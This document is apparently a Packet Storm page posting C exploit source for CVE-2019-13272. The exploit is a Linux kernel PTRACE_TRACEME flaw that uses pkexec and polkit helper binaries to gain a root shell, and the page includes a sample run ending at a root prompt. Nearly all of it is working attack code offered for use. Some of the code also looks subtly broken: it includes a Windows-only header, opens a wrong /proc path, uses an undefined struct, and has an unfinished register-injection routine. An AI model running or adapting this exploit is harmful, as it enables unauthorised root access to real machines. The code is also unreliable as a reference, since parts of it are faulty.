Linux Kernel 5.1.x PTRACE_TRACEME pkexec Local Privilege Escalation ≈ Packet Storm

# Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)
# Date: 11/22/21
# Exploit Author: Ujas Dhami
# Version: 4.19 - 5.2.1
# Platform: Linux
# Tested on:
# ~ Ubuntu 19.04 kernel 5.0.0-15-generic
# ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
# ~ Kali Linux kernel 4.19.0-kali5-amd64
# CVE: CVE-2019-13272

// ....
// Original discovery and exploit author: Jann Horn
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
// Modified exploit code of: BColes
// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
// ....
// ~ Uses the PolKit_Exec frontend.
// ~ PolKit_Action is branched.
// ~ Search is optimized.
// ~ Trunks attain search priority upon execution.
// ....
// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme
// ujas@kali:~$ ./exploit_traceme
// Welcome to your Arsenal!
// accessing variables...
// execution has reached EOP.
// familiar trunks are been searched ...
// trunk helper found: /usr/sbin/mate-power-backlight-helper
// helper initiated: /usr/sbin/mate-power-backlight-helper
// SUID process is being initiated (/usr/bin/pkexec) ...
// midpid is being traced...
// midpid attached.
// root@kali:/home/ujas#
// ....

#include <ctype.h>
#include <assert.h>
#include <conio.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <stddef.h>
#include <sys/user.h>
#include <linux/elf.h>
#include <stdarg.h>
#include <pwd.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#define _GNU_SOURCE

#define DEBUG
#ifdef DEBUG
#define dprintf printf
#endif
#define max(a,b) ((a)>(b) ? (a) : (b))
#define eff(expr) ({ \
typeof(expr) __res = (expr); \
if (__res == -1) { \
dprintf("[-] Error: %s\n", #expr); \
return 0; \
} \
__res; \
})

struct stat st;

const char *trunk[1024];

const char *trunks_rec[] = {
"/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
"/usr/sbin/mate-power-backlight-helper",
"/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
"/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
"/usr/lib/unity-settings-daemon/usd-backlight-helper",
"/usr/bin/xfpm-power-backlight-helper",
"/usr/bin/lxqt-backlight_backend",
"/usr/lib/gsd-backlight-helper",
"/usr/lib/gsd-wacom-led-helper",
"/usr/lib/gsd-wacom-oled-helper",
"/usr/libexec/gsd-wacom-led-helper",
"/usr/libexec/gsd-wacom-oled-helper",
"/usr/libexec/gsd-backlight-helper",

};
static int trace_align[2];
static const char *path_exec = "/usr/bin/pkexec";
static const char *path_action = "/usr/bin/pkaction";
static int fd = -1;
static int pipe_stat;
static const char *term_sh = "/bin/bash";
static int mid_succ = 1;
static const char *path_doublealign;

static char *tdisp(char *fmt, ...) {
static char overlayfs[10000];
va_list ap;
va_start(ap, fmt);
vsprintf(overlayfs, fmt, ap);
va_end(ap);
return overlayfs;
}

static int middle_main(void *overlayfs) {
prctl(PR_SET_PDEATHSIG, SIGKILL);
pid_t middle = getpid();
fd = eff(open("/proc/_fd/exe", O_RDONLY));
pid_t child = eff(fork());

if (child == 0) {
prctl(PR_SET_PDEATHSIG, SIGKILL);

eff(dup2(fd, 42));
int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));
char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());
eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
execl(path_exec, basename(path_exec), NULL);
while (1) {
char overlayfs[1000];
ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));
overlayfs[buflen] = '\0';
if (strstr(overlayfs, threadv)) break;
}

dprintf("SUID execution failed.");
exit(EXIT_FAILURE);
}

eff(dup2(fd, 0));
eff(dup2(trace_align[1], 1));

struct passwd *pw = getpwuid(getuid());
if (pw == NULL) {
dprintf("err: username invalid/failed to fetch username");
exit(EXIT_FAILURE);
}

mid_succ = 1;
execl(path_exec, basename(path_exec), "--user", pw->pw_name,
path_doublealign,
"--help", NULL);
mid_succ = 0;
dprintf("err: pkexec execution failed.");
exit(EXIT_FAILURE);
}

static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) {
struct user_regs_struct regs;
struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) };
eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
eff(waitpid(pid, &pipe_stat, 0));
eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));

unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;
struct injected_page {
unsigned long inj_arse[2];
unsigned long environment[1];
char arg0[8];
char path[1];
} ipage = {
.inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }
};
strcpy(ipage.arg0, arg0);
for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
unsigned long pro_d = ((unsigned long *)&ipage)[i];
eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long),
(void*)pro_d));
}

eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));
eff(ptrace(PTRACE_DETACH, pid, 0, NULL));
eff(waitpid(pid, &pipe_stat, 0));

regs.orig_rax = __NR_execveat;
regs.rdi = exec_fd;
regs.rsi = inject_surface + offsetof(struct injected_page, path);
regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);
regs.r10 = inject_surface + offsetof(struct injected_page, environment);
regs.r8 = AT_EMPTY_PATH;
}

static int stag_2(void) {
pid_t child = eff(waitpid(-1, &pipe_stat, 0));
timeexecbuffer(child, 42, "stage3");
return 0;
}

static int sh_spawn(void) {
eff(setresgid(0, 0, 0));
eff(setresuid(0, 0, 0));
execlp(term_sh, basename(term_sh), NULL);
dprintf("err: Shell spawn unsuccessful.", term_sh);
exit(EXIT_FAILURE);
}

static int check_env(void) {
const char* xdg_session = getenv("XDG_SESSION_ID");

dprintf("accessing variables...\n");

if (stat(path_action, &st) != 0) {
dprintf("err: pkaction not found at %s.", path_action);
exit(EXIT_FAILURE);
}
if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
dprintf("warn: PolKit agent not found.\n");
return 1;
}
if (stat("/usr/sbin/getsebool", &st) == 0) {
if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {
dprintf("warn: [deny_ptrace] is enabled.\n");
return 1;
}
}
if (xdg_session == NULL) {
dprintf("warn: $XDG_SESSION_ID is not set.\n");
return 1;
}
if (stat(path_exec, &st) != 0) {
dprintf("err: pkexec not found at %s.", path_exec);
exit(EXIT_FAILURE);
}

dprintf("execution has reached EOP.\n");

return 0;
}

int trunkh() {
char cmd[1024];
snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);
FILE *fp;
fp = popen(cmd, "r");
if (fp == NULL) {
dprintf("err: Failed to run %s.\n", cmd);
exit(EXIT_FAILURE);
}

char line[1024];
char buffer[2048];
int helper_index = 0;
int useful_action = 0;
static const char *threadv = "org.freedesktop.policykit.exec.path -> ";
int needle_length = strlen(threadv);

while (fgets(line, sizeof(line)-1, fp) != NULL) {
if (strstr(line, "implicit active:")) {
if (strstr(line, "yes")) {
useful_action = 1;
}
continue;
}

if (useful_action == 0)
continue;
useful_action = 0;

int length = strlen(line);
char* found = memmem(&line[0], length, threadv, needle_length);
if (found == NULL)
continue;

memset(buffer, 0, sizeof(buffer));
for (int i = 0; found[needle_length + i] != '\n'; i++) {
if (i >= sizeof(buffer)-1)
continue;
buffer[i] = found[needle_length + i];
}

if (stat(&buffer[0], &st) != 0)
continue;

if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
strstr(&buffer[0], "/cpugovctl") != 0 ||
strstr(&buffer[0], "/package-system-locked") != 0 ||
strstr(&buffer[0], "/cddistupgrader") != 0) {
dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);
continue;
}

trunk[helper_index] = strndup(&buffer[0], strlen(buffer));
helper_index++;

if (helper_index >= sizeof(trunk)/sizeof(trunk[0]))
break;
}

pclose(fp);
return 0;
}

int root_ptraceme() {
dprintf("helper initiated: %s\n", path_doublealign);

eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));
eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));
char overlayfs = 0;
eff(write(trace_align[1], &overlayfs, 1));

dprintf("SUID process is being initiated(%s) ...\n", path_exec);
static char stackv[1024*1024];
pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv),
CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
if (!mid_succ) return 1;
while (1) {
int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY);
char overlayfs[16];
int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1));
overlayfs[buflen] = '\0';
*strchrnul(overlayfs, '\n') = '\0';
if (strncmp(overlayfs, basename(path_doublealign), 15) == 0)
break;
usleep(100000);
}

dprintf("midpid is being traced...\n");
eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
eff(waitpid(midpid, &pipe_stat, 0));
dprintf("midpid attached.\n");

timeexecbuffer(midpid, 0, "stage2");
exit(EXIT_SUCCESS);
}

int main(int argc, char **inj_arse) {
if (strcmp(inj_arse[0], "stage2") == 0)
return stag_2();
if (strcmp(inj_arse[0], "stage3") == 0)
return sh_spawn();

dprintf("Welcome to your Arsenal!\n");

check_env();

if (argc > 1 && strcmp(inj_arse[1], "check") == 0) {
exit(0);
}

dprintf("efficient trunk is being searched...\n");
trunkh();
for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) {
if (trunk[i] == NULL)
break;

if (stat(trunk[i], &st) == 0) {
path_doublealign = trunk[i];
root_ptraceme();
}
}

dprintf("familiar trunks are been searched ...\n");
for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) {
if (stat(trunks_rec[i], &st) == 0) {
path_doublealign = trunks_rec[i];
dprintf("trunk helper found: %s\n", path_doublealign);
root_ptraceme();
}
}

return 0;
}

Image

Pensée du jour :

Ce que l'homme fait ,

l'homme peut le défaire.

 

"No secure path in the world"